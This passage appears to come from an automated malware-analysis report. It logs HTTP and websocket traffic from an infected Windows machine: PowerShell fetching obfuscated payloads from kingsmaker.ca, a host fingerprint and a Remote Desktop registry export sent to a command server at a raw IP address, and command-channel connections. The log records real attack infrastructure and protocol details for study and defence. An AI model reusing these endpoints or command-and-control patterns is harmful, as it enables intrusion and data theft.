65 57 77 38 67 37 32 57 6b 43 41 69 67 43 51 79 59 49 54 71 4b 61 35 65 4c 61 55 35 50 59 77 6c 45 50 6e 54 4d 30 74 69 4e 42 47 4d 6e 43 70 36 65 71 4b 68 49 70 49 4d 44 69 4d 64 45 6a 70 74 78 78 73 74 35 47 76 2b 46 77 67 44 61 6e 55 52 2f 6d 55 33 46 57 76 2f 6f 70 4c 33 2f 4f 57 45 7a 66 58 53 77 59 7a 5a 43 4b 42 72 61 54 58 51 45 75 56 34 41 71 39 2b 39 64 5a 53 49 64 4d 6e 4f 58 42 4e 79 31 4d 67 63 2f 46 6a 6c 74 37 79 75 4f 4d Data Ascii: 1631732868572\|VqK1ypl42UlChA+IIEtWTmH7+hmUf6jwClKmGjYQDIjgJf9EkeWw8g72WkCAigCQyYITqKa5eLaU5PYwlEPnTM0tiNBGMnCp6eqKhIpIMDiMdEjptxxst5Gv+FwgDanUR/mU3FWv/opL3/OWEzfXSwYzZCKBraTXQEuV4Aq9+9dZSIdMnOXBNy1Mgc/Fjlt7yuOM
Nov 29, 2024 09:22:52.234828949 CET	150	IN	Data Raw: 74 55 66 46 63 37 39 73 45 64 38 47 44 69 49 65 4b 79 69 44 70 48 73 73 69 71 75 30 72 72 4d 4b 74 37 69 6e 74 31 47 30 6e 37 6c 4c 32 70 78 6c 31 74 2f 36 35 41 33 39 6a 47 68 76 62 4b 73 69 6c 61 6c 49 76 47 54 43 78 4d 33 48 7a 71 70 31 33 65 Data Ascii: tUfFc79sEd8GDiIeKyiDpHssiqu0rrMKt7int1G0n7lL2pxl1t/65A39jGhvbKsilalIvGTCxM3Hzqp13eh0GiPRyFOGQd+s6kQt/yvJyhay1/AixZiPQNIE0L/dwikof9lvYBIUD0dFlSN0bQ==
Nov 29, 2024 09:22:52.234839916 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 09:23:38.843478918 CET	164	OUT	GET /client/ws HTTP/1.1 Host: 23.88.71.29:8000 Connection: Upgrade Upgrade: websocket Sec-WebSocket-Key: TKWF3o80RkqumbfeJjv41Q== Sec-WebSocket-Version: 13
Nov 29, 2024 09:23:39.993643999 CET	836	IN	HTTP/1.1 101 Switching Protocols Upgrade: Websocket Server: Microsoft-IIS/8.5 Sec-Websocket-Accept: U98xKzwZH5LvcQutXFuCDC/EY7I= CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HBwWIY9uC5GsIt5A5CTxT%2Fp%2F1tyIHAaDpatkePO54Ava4t43XHjr6zPvnb7ha4oOtMKlymhvY6V4DEJUYczTYgq2k5LuVyzgYhKuCJrq1GflCRrpqhvsCRYwjujzF0kLUvhn%2BZUBF9qd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8ea13264dfd5d362-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5421&min_rtt=5421&rtt_var=2710&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=306&delivery_rate=0&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Connection: Upgrade Date: Fri, 29 Nov 2024 08:23:39 GMT

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 09:23:43.512734890 CET	234	OUT	POST /api/registry HTTP/1.1 Host: 23.88.71.29:8000 Connection: Keep-Alive Content-Type: application/json Content-Length: 102 Data Raw: 22 36 33 30 31 33 33 37 32 46 36 35 37 35 41 39 44 34 45 41 32 39 43 42 36 30 38 37 39 38 45 44 39 7c 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 7c 31 30 2e 30 2e 31 39 30 34 32 20 4e 2f 41 20 42 75 69 6c 64 20 31 39 30 34 32 2d 31 30 2e 30 2e 31 39 30 34 31 2e 31 30 38 31 22 Data Ascii: "63013372F6575A9D4EA29CB608798ED9\|Microsoft Windows 10 Pro\|10.0.19042 N/A Build 19042-10.0.19041.1081"
Nov 29, 2024 09:23:44.712769985 CET	801	IN	HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/8.5 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wy7DXvJitwYqjRhCVt60KA5LnR9nUk3Xnfa%2BOQjAcPesV0cMT6a%2BewTk4ajvJjTFcum0MGKsWR6fdTZPfpoC6ZMRegrU9xjncIt8nKx1sruEsbEfPGycC1So9EY6NcHnEW1n9rbZ68Pr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8ea13281fd00dbbb-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5523&min_rtt=5523&rtt_var=2761&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=379&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Date: Fri, 29 Nov 2024 08:23:44 GMT Content-Length: 32 Data Raw: 32 39 62 37 61 38 66 38 64 39 39 36 37 63 61 34 63 33 31 36 36 32 36 39 61 61 34 64 65 37 35 37 Data Ascii: 29b7a8f8d9967ca4c3166269aa4de757

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 09:23:45.024075031 CET	1289	OUT	POST /api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757 HTTP/1.1 Host: 23.88.71.29:8000 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=---------------------8dd10253a34234b Content-Length: 5689 Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 32 35 33 61 33 34 32 33 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 67 42 61 63 6b 75 70 2e 72 65 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff fe 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6f 00 72 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 35 00 2e 00 30 00 30 00 0d 00 0a 00 0d 00 0a 00 5b 00 48 00 4b 00 45 00 59 00 5f 00 4c 00 4f 00 43 00 41 00 4c 00 5f 00 4d 00 41 00 43 00 48 00 49 00 4e 00 45 00 5c 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 [TRUNCATED] Data Ascii: -----------------------8dd10253a34234bContent-Disposition: form-data; name="file"; filename="regBackup.reg"Content-Type: application/octet-streamWindows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]"DependOnService"=hex(7):52,00,50,00,43,00,53,00,53,00,00,00,00,00"Description"="@%SystemRoot%\\System32\\termsrv.dll,-267""DisplayName"="@%SystemRoot%\\System32\\termsrv.dll,-268""ErrorControl"=dword:00000001"FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\ 00,01,00,00,00,60,ea, [TRUNCATED]
Nov 29, 2024 09:23:45.666939020 CET	846	IN	HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Server: Microsoft-IIS/8.5 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cvLjKpOzISJssuo%2F521DaaclSFUPPdgn5irrRYb9KSB%2BM7S4RySnTH6xKNFV%2Fu9IPLJqNrqWk6l3XQxJ3D70n8DVr7uvDOERngJm93lmf%2FoKwkx%2F6chL9%2F7ycOHnjR%2Fxbuy1i1ue2vD1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8ea1328b6cccdbbb-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5524&min_rtt=5509&rtt_var=2074&sent=10&recv=11&lost=0&retrans=0&sent_bytes=814&recv_bytes=6476&delivery_rate=527456&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Date: Fri, 29 Nov 2024 08:23:44 GMT Content-Length: 41 Data Raw: 46 69 6c 65 20 72 65 67 42 61 63 6b 75 70 2e 72 65 67 20 75 70 6c 6f 61 64 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e Data Ascii: File regBackup.reg uploaded successfully.

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 09:24:24.333688974 CET	165	OUT	GET /command/ws HTTP/1.1 Host: 23.88.71.29:8000 Connection: Upgrade Upgrade: websocket Sec-WebSocket-Key: Gm2s7evn+UG3WIExr2XKhQ== Sec-WebSocket-Version: 13
Nov 29, 2024 09:24:25.197699070 CET	844	IN	HTTP/1.1 101 Switching Protocols Upgrade: Websocket Server: Microsoft-IIS/8.5 Sec-Websocket-Accept: bDOi5g9U0MSEJ8JIF/GAkZkOHuQ= CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b1rJIid888DAORIId0F7%2BFbWLWwGA%2BRDHsrK%2FVqDuBA5HNQa9w60f1C4goFCWCLzFfD7ipBSun2YBc6cX6lqqltzjyA63xegv6%2BuP1v3QIDhMRsmTqOlyDRze%2FBXX0RFSKVXmCyC%2B%2FWa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8ea13381187fd395-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5434&min_rtt=5434&rtt_var=2717&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=308&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Connection: Upgrade Date: Fri, 29 Nov 2024 08:24:25 GMT

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:22:10 UTC	392	OUT	GET /file3/f4c66a2f2c057f3b06250f3211c5a32657d9f73187a74ad9a0c73befa87bed5adaa1b59ea3fe07e54381481ca0bece87f5a691b18216ec8f663043055b37a6c8d7a59731af4b6e1340bfd787088106580f90f257aa865ae7b57e00e4873a697e/Windows%20Defender/16/16/user/209 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Connection: Keep-Alive
2024-11-29 08:22:11 UTC	1099	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:22:11 GMT Content-Type: application/octet-stream Content-Length: 2858 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ErCoKhp7MWzSgipydexLv%2F2P2zEa7EvnhX8YK0swj1sO7hwrX7rFgQRApy66sZsHCy5MnA4jlh%2BfqT8Adcxg9J20CsSgFfzcIYytDfX3ff4rJLunP6ZzWWhjBjryYR2%2BVbwPoSdHJ82Z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7706&min_rtt=1023&rtt_var=13750&sent=4&recv=6&lost=0&retrans=0&sent_bytes=755&recv_bytes=2220&delivery_rate=26794&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea1303e597d0ad1-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158731&min_rtt=158649&rtt_var=33595&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1006&delivery_rate=24102&cwnd=252&unsent_bytes=0&cid=f5d9405cb17342d0&ts=895&x=0"
2024-11-29 08:22:11 UTC	270	IN	Data Raw: 25 64 73 68 68 77 6c 6d 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 57 47 57 34 55 56 30 56 60 30 6d 70 54 6c 71 4f 63 54 34 70 55 6c 30 4f 4f 47 6d 59 53 55 53 4f 60 6c 4c 79 56 56 71 4b 4f 47 71 44 55 55 47 4e 63 57 54 78 55 56 30 4b 64 54 30 54 52 55 53 4e 4c 6d 6d 32 55 6f 71 4e 60 54 34 44 63 46 30 5b 57 46 65 32 55 6f 71 46 60 6a 31 78 52 55 57 5b 60 6a 6d 37 55 54 65 57 65 30 6d 75 57 59 65 51 57 47 54 78 56 56 30 52 63 47 71 49 57 59 6d 5b 57 46 4c 79 55 30 53 4b 4c 57 71 70 52 59 71 4f 64 6d 44 76 55 30 53 57 4f 57 6d 70 63 46 30 60 57 44 4b 75 56 6a 53 72 63 54 Data Ascii: %dshhwlm<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#WGW4UV0V`0mpTlqOcT4pUl0OOGmYSUSO`lLyVVqKOGqDUUGNcWTxUV0KdT0TRUSNLmm2UoqN`T4DcF0[WFe2UoqF`j1xRUW[`jm7UTeWe0muWYeQWGTxVV0RcGqIWYm[WFLyU0SKLWqpRYqOdmDvU0SWOWmpcF0`WDKuVjSrcT
2024-11-29 08:22:11 UTC	1369	IN	Data Raw: 47 71 59 57 55 4f 60 53 30 71 72 55 6c 71 6e 60 54 34 37 58 7b 43 4f 57 46 69 70 55 59 71 57 4c 6d 6d 37 53 6c 75 51 57 47 5b 70 55 6a 65 52 60 30 6d 75 53 59 71 4e 53 44 31 31 55 55 4b 47 4f 44 30 37 50 55 53 5b 60 6a 71 75 55 6a 65 60 60 30 71 44 57 55 57 60 60 6c 4f 37 55 6c 71 6b 60 54 38 32 4c 44 75 4a 53 31 34 33 5b 47 62 30 4c 44 6d 44 4c 46 65 4f 57 44 47 32 55 32 62 76 52 31 53 53 63 31 34 45 5b 7b 43 4d 56 6c 34 56 65 57 6a 7b 54 6f 43 68 4c 6b 53 6f 57 55 4b 56 65 57 71 45 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 33 4f 49 53 6f 6d 5b 57 7b 43 77 52 54 5b 31 54 57 54 76 4e 56 6d 69 63 57 5b 70 5b 44 58 76 5b 31 71 49 64 49 5b 60 4c 45 47 37 56 6f 6d 43 62 44 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 60 6a 6d 47 55 6f 5b 68 63 6d 71 72 58 33 34 53 Data Ascii: GqYWUO`S0qrUlqn`T47X{COWFipUYqWLmm7SluQWG[pUjeR`0muSYqNSD11UUKGOD07PUS[`jquUje``0qDWUW``lO7Ulqk`T82LDuJS143[Gb0LDmDLFeOWDG2U2bvR1SSc14E[{CMVl4VeWj{ToChLkSoWUKVeWqEPkeDTV8oRTOC[3OISom[W{CwRT[1TWTvNVmicW[p[DXv[1qIdI[`LEG7VomCbDSSc14E`TGoRTOC`jmGUo[hcmqrX34S
2024-11-29 08:22:11 UTC	1219	IN	Data Raw: 47 6f 52 54 44 76 52 33 5b 53 4c 44 75 44 54 59 40 7b 58 54 65 72 62 30 71 55 5b 33 75 5b 4c 6b 6a 79 58 6c 34 53 5b 31 79 59 5b 45 43 4b 53 44 47 76 53 47 47 76 4f 31 53 53 63 31 71 44 54 56 38 4a 5b 44 69 4a 4f 56 57 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6d 53 60 57 7b 57 73 52 54 4f 4a 60 57 71 59 5b 49 43 68 60 54 4b 73 58 6b 4f 6a 65 56 4b 49 4e 56 69 60 50 31 47 73 5b 47 69 4a 62 44 6d 70 62 31 34 45 5b 33 75 4a 52 6a 65 4e 65 6c 4b 74 54 6c 79 68 63 6d 47 6f 54 47 4f 42 52 6c 4b 74 56 6f 5b 69 4c 6d 57 31 57 6b 4b 56 60 57 57 75 57 6f 69 6a 57 30 5b 37 5b 44 4f 43 65 47 5b 58 52 6f 43 4b 50 30 48 79 58 33 30 73 5b 31 79 56 57 6f 71 60 57 54 71 6e 58 7b 4b 72 60 6d 57 49 53 6f 6d 6b 4c 6c 79 30 56 6f 71 7b 55 6a 4f 71 50 56 65 4b 50 Data Ascii: GoRTDvR3[SLDuDTY@{XTerb0qU[3u[LkjyXl4S[1yY[ECKSDGvSGGvO1SSc1qDTV8J[DiJOVW2LDuKP1GoRTOC[1mEPmS`W{WsRTOJ`WqY[ICh`TKsXkOjeVKINVi`P1Gs[GiJbDmpb14E[3uJRjeNelKtTlyhcmGoTGOBRlKtVo[iLmW1WkKV`WWuWoijW0[7[DOCeG[XRoCKP0HyX30s[1yVWoq`WTqnX{Kr`mWISomkLly0Voq{UjOqPVeKP

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:22:12 UTC	284	OUT	POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663bb648db58ef92bd3c982ad93b9ec563 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Content-Length: 302
2024-11-29 08:22:12 UTC	302	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 6b 69 6e 67 73 6d 61 6b 65 72 2e 63 61 2f 66 69 6c 65 32 2f 31 63 62 66 33 31 31 37 63 31 31 62 34 62 61 61 34 34 64 31 61 66 32 65 64 36 37 32 64 33 66 37 65 36 38 32 66 38 38 30 62 61 32 61 66 36 64 61 39 61 62 34 39 62 30 35 62 36 65 64 65 62 36 64 65 61 35 35 32 32 65 64 62 34 63 32 63 63 36 63 38 61 61 38 32 37 35 62 32 38 64 33 35 36 65 36 32 62 32 31 32 38 37 66 30 37 33 62 34 39 66 61 38 30 37 31 63 33 62 39 62 32 33 30 65 30 62 65 30 39 35 36 62 64 65 64 65 32 61 37 35 39 32 35 66 32 33 33 34 34 39 35 39 62 39 66 65 30 66 64 39 66 38 32 39 64 39 34 66 66 65 65 65 37 64 66 65 36 38 62 37 37 34 31 38 63 33 35 36 63 31 64 39 35 63 34 64 64 62 61 33 34 Data Ascii: [ "\"begin download https://kingsmaker.ca/file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522edb4c2cc6c8aa8275b28d356e62b21287f073b49fa8071c3b9b230e0be0956bdede2a75925f23344959b9fe0fd9f829d94ffeee7dfe68b77418c356c1d95c4ddba34
2024-11-29 08:22:12 UTC	989	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:22:12 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mbS%2BHrkyAAWV5X6CU8zqOSZXoCVj3Id2eHitHulTyW%2Fu6AwH8NwDAwNb3WmUupFjomFp0%2FesmaQz0xCqcysypQkegD%2BDcON%2BfIDYJEqzWjZflIAnsM8kZtPI%2FeFmT7zIkhIVpJNP3RJK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9377&min_rtt=1458&rtt_var=16385&sent=4&recv=6&lost=0&retrans=0&sent_bytes=771&recv_bytes=1986&delivery_rate=22526&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea13046cde90a03-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158887&min_rtt=158742&rtt_var=33711&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1246&delivery_rate=24057&cwnd=252&unsent_bytes=0&cid=f8878deba185fcc3&ts=885&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:22:13 UTC	364	OUT	GET /file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522edb4c2cc6c8aa8275b28d356e62b21287f073b49fa8071c3b9b230e0be0956bdede2a75925f23344959b9fe0fd9f829d94ffeee7dfe68b77418c356c1d95c4ddba34383a8308b2f4fdd59f7367 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca
2024-11-29 08:22:14 UTC	1105	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:22:14 GMT Content-Type: application/octet-stream Content-Length: 2854 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r4Si9EqRCxRWVPWloPnEj99ISCg5LOq2hm4BXph9y78XEnBRhFUXzyGeo6djBRWGfQbbEegXXEl%2F7YWvQyNpGS82mibCquVb1FhdJNpq35%2F4n3WXOUV1FtJtelfxpHENBKupuq0ILdrW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=12283&min_rtt=1009&rtt_var=18558&sent=37&recv=49&lost=0&retrans=0&sent_bytes=10684&recv_bytes=33064&delivery_rate=4048059&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea1304f1f33a984-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158810&min_rtt=158659&rtt_var=33702&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1002&delivery_rate=24068&cwnd=252&unsent_bytes=0&cid=6cec1749a76d04cd&ts=887&x=0"
2024-11-29 08:22:14 UTC	264	IN	Data Raw: 25 74 68 69 62 66 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 57 30 57 37 55 6c 71 46 60 6a 34 44 52 6c 69 4e 64 6a 71 71 55 31 53 57 64 6a 30 54 52 6c 69 60 57 30 6a 31 55 57 65 47 64 6a 34 44 56 55 4b 4e 53 46 53 73 55 6f 71 42 60 54 38 59 52 6c 79 4e 57 44 34 71 56 6a 65 56 60 57 6a 78 54 6c 79 60 60 6d 5b 6e 56 57 65 4e 60 6a 30 54 55 6c 6d 5b 63 57 57 32 55 57 65 53 4c 54 34 75 55 55 53 4e 57 31 31 30 55 57 65 60 60 47 71 44 60 46 71 51 57 31 6a 79 56 6d 53 53 4f 44 38 44 54 6c 6d 4e 64 6d 47 35 56 6a 65 4b 64 57 71 59 57 55 53 60 60 6a 34 6e 55 59 71 53 64 47 71 54 Data Ascii: %thibf<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#W0W7UlqF`j4DRliNdjqqU1SWdj0TRli`W0j1UWeGdj4DVUKNSFSsUoqB`T8YRlyNWD4qVjeV`WjxTly``m[nVWeN`j0TUlm[cWW2UWeSLT4uUUSNW110UWe``GqD`FqQW1jyVmSSOD8DTlmNdmG5VjeKdWqYWUS``j4nUYqSdGqT
2024-11-29 08:22:14 UTC	1369	IN	Data Raw: 30 65 60 60 44 31 78 53 6c 75 60 57 46 4c 78 56 57 53 52 63 44 30 44 57 6c 30 4e 4c 6d 6d 32 55 30 53 6b 4c 47 71 54 54 6c 6d 4e 63 54 5b 70 56 56 30 4f 4c 31 34 59 54 59 65 60 60 6d 71 70 55 6c 71 53 4c 57 71 70 60 7b 4b 60 53 44 44 78 56 6d 65 47 4c 47 71 44 50 55 43 4e 57 46 75 32 56 6c 71 47 64 57 6d 54 5b 46 71 5b 57 46 69 6e 55 6f 71 53 4c 54 30 37 55 59 71 51 57 31 31 7b 55 31 53 6a 60 31 30 54 60 32 6d 5b 64 6d 6a 31 55 57 65 46 60 6d 6d 54 56 56 6d 51 65 7b 43 4d 52 6a 65 4e 65 6c 53 59 4f 55 43 4b 53 45 43 6f 55 57 53 43 65 31 38 32 4c 44 75 44 54 56 38 4e 50 33 62 76 52 30 71 74 57 6f 57 5b 4c 30 4b 76 58 6b 48 31 5b 30 54 78 57 6f 57 60 50 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 6b 53 31 5b 34 56 57 62 76 63 31 6d 46 65 47 47 57 4c 45 6d 71 Data Ascii: 0e``D1xSlu`WFLxVWSRcD0DWl0NLmm2U0SkLGqTTlmNcT[pVV0OL14YTYe``mqpUlqSLWqp`{K`SDDxVmeGLGqDPUCNWFu2VlqGdWmT[Fq[WFinUoqSLT07UYqQW11{U1Sj`10T`2m[dmj1UWeF`mmTVVmQe{CMRjeNelSYOUCKSECoUWSCe182LDuDTV8NP3bvR0qtWoW[L0KvXkH1[0TxWoW`P1H2SGGw[1mEPVekS1[4VWbvc1mFeGGWLEmq
2024-11-29 08:22:14 UTC	1221	IN	Data Raw: 43 5b 4c 6c 66 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 54 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 6c 54 55 43 4d 52 54 4f 43 5b 31 6d 43 4c 44 75 6c 54 55 43 4d 53 47 47 76 4c 33 47 49 63 49 4f 60 54 33 65 73 56 55 48 34 4c 56 4b 74 54 56 65 4c 57 33 50 76 52 54 53 43 62 44 53 53 62 45 65 44 54 56 38 4a 53 47 47 77 52 6c 53 48 52 6b 57 6d 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 54 56 6d 62 30 60 31 6d 45 52 6c 6d 60 57 33 53 76 58 6c 6d 42 60 33 48 7b 5b 49 57 68 53 7b 6d 6e 56 6a 4f 43 60 33 53 58 52 6f 43 4b 60 6f 4f 4e 50 33 65 73 52 6a 71 49 55 6f 5b 68 63 6d 4b 72 58 6c 34 53 5b 30 43 55 50 6a 71 68 63 6d 71 33 58 55 4b 57 65 47 58 78 57 6c 6d 57 63 57 5b 35 5b 47 65 56 64 6c 53 45 50 Data Ascii: C[Llf2SGGw[1mEPVeKP1GoRTOC[1mEPT4E`TGoRTOC[1mEPVelTUCMRTOC[1mCLDulTUCMSGGvL3GIcIO`T3esVUH4LVKtTVeLW3PvRTSCbDSSbEeDTV8JSGGwRlSHRkWme{CMRTOC[1mEPVeKP1KTVmb0`1mERlm`W3SvXlmB`3H{[IWhS{mnVjOC`3SXRoCK`oONP3esRjqIUo[hcmKrXl4S[0CUPjqhcmq3XUKWeGXxWlmWcW[5[GeVdlSEP

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:22:15 UTC	364	OUT	GET /file2/15d47d61496bbc5686d7406c0812dea52edfae361c42a72b85312aef81a346647d70b9be53bdebcdef5aacc13bbe01d56c85c91fad8c9b5e4884b741db2ee8f3a341e996a09fa3ade76a4e05f7f0974e4b6acbc75d0f6c645f96d06ea4d04590f12a7ca8a7453339c787d192c681aca6 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca
2024-11-29 08:22:16 UTC	1107	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:22:16 GMT Content-Type: application/octet-stream Content-Length: 21690 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QMZaGbQSCV6G9woWfdwmbFFvKr06l3IjeviGDipD6udhQ8cwU29hvSGsj748kdmmiGg1UmC1cNS9F9sqylE%2Fj4vTfLnOuJ%2BDY0L1bVAe2069tBeZMiP8%2FsHOS1aeBMbfEhlkvE5TyS6U"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8670&min_rtt=1009&rtt_var=13259&sent=41&recv=53&lost=0&retrans=0&sent_bytes=14407&recv_bytes=34064&delivery_rate=4048059&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: 